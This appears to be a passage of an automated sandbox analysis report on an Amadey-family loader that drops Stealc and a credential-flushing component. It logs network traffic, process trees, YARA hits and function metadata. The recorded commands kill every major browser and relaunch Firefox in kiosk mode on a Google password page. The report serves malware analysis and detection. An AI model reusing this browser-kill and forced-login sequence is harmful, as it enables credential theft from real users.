cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1614&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=1763285&cwnd=241&unsent_bytes=0&cid=fb642883f701f935&ts=1229&x=0"
2024-11-30 03:06:51 UTC	214	IN	Data Raw: 64 30 0d 0a 4f 72 7a 4d 63 6a 78 35 49 75 79 7a 41 43 43 4d 33 75 4f 64 6a 76 42 43 55 5a 72 4a 39 50 57 79 57 4d 36 49 65 6a 52 46 54 58 68 68 78 2b 34 48 48 6b 4d 41 68 4d 64 30 55 4c 61 43 7a 4d 47 68 77 58 70 6b 74 50 76 46 77 4a 78 70 2f 37 74 55 42 58 4d 52 56 31 58 61 71 69 34 54 48 55 65 4b 6e 57 56 59 36 66 7a 50 76 2b 69 45 59 47 75 71 35 64 61 51 6b 47 4c 2f 39 56 5a 50 5a 7a 68 61 41 4a 36 6b 42 6b 67 4a 47 4c 43 63 58 41 2b 39 35 74 61 7a 76 4d 46 33 66 36 76 34 78 39 75 44 62 70 4b 6e 43 55 41 67 4c 42 56 6d 6b 37 34 54 55 68 31 4e 67 5a 31 6c 57 4f 6e 38 7a 37 2f 6f 68 47 42 72 71 75 58 57 6b 4a 42 69 2f 76 55 6e 0d 0a Data Ascii: d0OrzMcjx5IuyzACCM3uOdjvBCUZrJ9PWyWM6IejRFTXhhx+4HHkMAhMd0ULaCzMGhwXpktPvFwJxp/7tUBXMRV1Xaqi4THUeKnWVY6fzPv+iEYGuq5daQkGL/9VZPZzhaAJ6kBkgJGLCcXA+95tazvMF3f6v4x9uDbpKnCUAgLBVmk74TUh1NgZ1lWOn8z7/ohGBrquXWkJBi/vUn
2024-11-30 03:06:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49922	18.208.8.205	443	3520	C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 03:07:09 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-11-30 03:07:09 UTC	224	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:07:09 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-11-30 03:07:09 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.228"}

Target ID:	0
Start time:	22:04:56
Start date:	29/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x700000
File size:	1'930'752 bytes
MD5 hash:	27A3277F6DAEC8E2369A88CEA407FB46
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1671498988.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1711619647.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:04:58
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x6e0000
File size:	1'930'752 bytes
MD5 hash:	27A3277F6DAEC8E2369A88CEA407FB46
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1688680503.0000000004860000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1729011202.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:04:59
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x6e0000
File size:	1'930'752 bytes
MD5 hash:	27A3277F6DAEC8E2369A88CEA407FB46
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1741706182.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:06:00
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x6e0000
File size:	1'930'752 bytes
MD5 hash:	27A3277F6DAEC8E2369A88CEA407FB46
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2306646203.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	22:06:12
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe"
Imagebase:	0xb70000
File size:	1'473'536 bytes
MD5 hash:	0F325C99B7B2585A266CF50D88F134C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2452245090.0000000006240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 16%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:06:13
Start date:	29/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Imagebase:	0x380000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	22:06:13
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 1148
Imagebase:	0x2b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:06:21
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe"
Imagebase:	0x600000
File size:	1'864'192 bytes
MD5 hash:	A9A9F7A7B9ED25C8DF3E4676A11593F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	22:06:29
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe"
Imagebase:	0x2c0000
File size:	1'840'128 bytes
MD5 hash:	BB0C42D0421512D8F7796F5253543456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.2641325721.00000000002C1000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000003.2600123548.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:06:37
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe"
Imagebase:	0x230000
File size:	922'112 bytes
MD5 hash:	0D9D9AC3AED513438004818F468DE528
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialFlusher, Description: Yara detected Credential Flusher, Source: 0000000F.00000003.2670852779.0000000001953000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:06:37
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xb0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:06:37
Start date:	29/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:06:39
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0xb0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:06:39
Start date:	29/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:06:40
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0xb0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:06:40
Start date:	29/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:06:40
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0xb0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:06:40
Start date:	29/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:06:40
Start date:	29/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0xb0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:06:40
Start date:	29/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:06:40
Start date:	29/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:06:41
Start date:	29/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:06:41
Start date:	29/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	22:06:41
Start date:	29/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2236 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91716696-7f11-4900-9d33-9e5d096728d3} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb6d310 socket
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	22:06:43
Start date:	29/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dd50345-4e1a-4a0d-ac3a-34bdbd555491} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb43510 rdd
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	22:06:46
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe"
Imagebase:	0x3a0000
File size:	2'765'824 bytes
MD5 hash:	47AA764406BA64383AC50E4101F34474
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:06:49
Start date:	29/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7dd9b6f-0496-49cf-b3a6-fd4ff652e245} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1def0e90f10 utility
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	22:06:59
Start date:	29/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe"
Imagebase:	0xe60000
File size:	4'467'200 bytes
MD5 hash:	52FCB84B6A36A8E28A1B56F2603EDF23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Has exited:	false

Show Windows behavior

Function 050F0D2C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713622299.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d92ee46f82c39398bd38bbee30ee695db3cffcf30fc8cd86984163636ad244
Instruction ID: 060ee5bf6262dc399d4678b072f1c34e4dcd916e666806e43a8e5602e6da6f55
Opcode Fuzzy Hash: 08d92ee46f82c39398bd38bbee30ee695db3cffcf30fc8cd86984163636ad244
Instruction Fuzzy Hash: 0AE012DE15D962FD6153C5073A388FF694FD4C7B703358425BA1BCBA4392856A8602A0

Function 050F0D92 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713622299.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf87e596ad8de08a3ad8a3cec41f1d1be37f75ff919884c55ab0e6dd2560bde4
Instruction ID: 152864bf36dc59dd8e0088ebcd9df6e1069ff97d3379e6e9ecd2a97d7e5f2e7c
Opcode Fuzzy Hash: cf87e596ad8de08a3ad8a3cec41f1d1be37f75ff919884c55ab0e6dd2560bde4
Instruction Fuzzy Hash: 2E2183FB24D215BDB20295917A2C9FE6B6EE5D3730334847AF543C6903D2850A4E9331

Function 050F0DD0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713622299.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1f98f0f89c65c618789ca3f303485bbb52351cf34f6ef25e5a238ec4ccf114
Instruction ID: e46da1a61e820d799a745916f83b21e3308a8426b07bc1e6a09b378e0515afb2
Opcode Fuzzy Hash: 4c1f98f0f89c65c618789ca3f303485bbb52351cf34f6ef25e5a238ec4ccf114
Instruction Fuzzy Hash: 02015EEB289214BD7242D9827B28AFF6B6EE5D7771330C43AF507D5903E2940A4E6231

Function 050F0DEC Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713622299.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 712f98235c24b21ede38462b6ce4408a40bf143c69b5674d91349c6d33414519
Instruction ID: 3a122ae2ca95ba94d73ab8cbec9075e33c03762b8ea7b52164f59fc8548138d0
Opcode Fuzzy Hash: 712f98235c24b21ede38462b6ce4408a40bf143c69b5674d91349c6d33414519
Instruction Fuzzy Hash: 070184EF288204BD724299827B28AFE6BAEE5D7731330C436F507D5903E2D44A4E6230

Function 050F0E13 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713622299.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cadd7ec1cf6567494809d0d88212652b3fd9e74d21d2cf726aa837e950a146a
Instruction ID: ef1972b6dfb35ac3e0cc33cdfec4cdd11e23df670bc5f064914bdf4cc85e0ed2
Opcode Fuzzy Hash: 9cadd7ec1cf6567494809d0d88212652b3fd9e74d21d2cf726aa837e950a146a
Instruction Fuzzy Hash: A80147F714C2546DE24285912E24AFF6BADDAD27303318437F803C7583E289090E4231

Function 050F0E4E Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713622299.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d69cbbe6a4b7a009805d73386d4faad44c4215170d171873aa375b89e869d3
Instruction ID: 1535a8e31497c96bd37c94a69ee9a30383db59ef0fe58a0d6eab336fa7cea82d
Opcode Fuzzy Hash: d1d69cbbe6a4b7a009805d73386d4faad44c4215170d171873aa375b89e869d3
Instruction Fuzzy Hash: 77F01CEB18D111ADB24295823B28AFB6BAEE4D67713318466F443C6946E2890A4F6631

Analysis Process: skotes.exePID: 2312, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.5%
Total number of Nodes:	1303
Total number of Limit Nodes:	37

Executed Functions

Function 006EBE30 Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 313
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC), ref: 006EBEB8
InternetOpenW.WININET(00738DC8,00000000,00000000,00000000,00000000), ref: 006EBEC8
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 006EBEEB
HttpOpenRequestA.WININET(?,00000000), ref: 006EBF36
HttpSendRequestA.WININET(?,00000000), ref: 006EBFF6
InternetReadFile.WININET(?,?,000003FF,?), ref: 006EC0A7
InternetCloseHandle.WININET(?), ref: 006EC187
InternetCloseHandle.WININET(?), ref: 006EC18F
InternetCloseHandle.WININET(?), ref: 006EC197

Strings

stoi argument out of range, xrefs: 006EE4EA
h, xrefs: 006ED5D3
8HJUeIfzLo==, xrefs: 006EC3CB, 006EC623
RE1NXF==, xrefs: 006EBF0E
invalid stoi argument, xrefs: 006EE4F4
8HJUeMD Lq5=, xrefs: 006EC465
RmNn, xrefs: 006ED606

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$h$invalid stoi argument$stoi argument out of range
API String ID: 2167506142-3605111921
Opcode ID: 679d07ffeddcaec68a2af2bd252a68a0fa8f8b3b92e6c043e22c0bc9b1b344e5
Instruction ID: cd0ac8d00c393b5b78c97b997c5d174418c1b028fd31ef28b88c4aab5902d7cf
Opcode Fuzzy Hash: 679d07ffeddcaec68a2af2bd252a68a0fa8f8b3b92e6c043e22c0bc9b1b344e5
Instruction Fuzzy Hash: 36B102B1A012589BDB28CF29CC84BEEBB7AEF41314F50419CF508972D2DB759AC1CB95

Function 006E65E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 006E6680

Strings

ISNmfV==, xrefs: 006E67D1
GSTmfV==, xrefs: 006E6728
RySfdMLx, xrefs: 006E669C

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
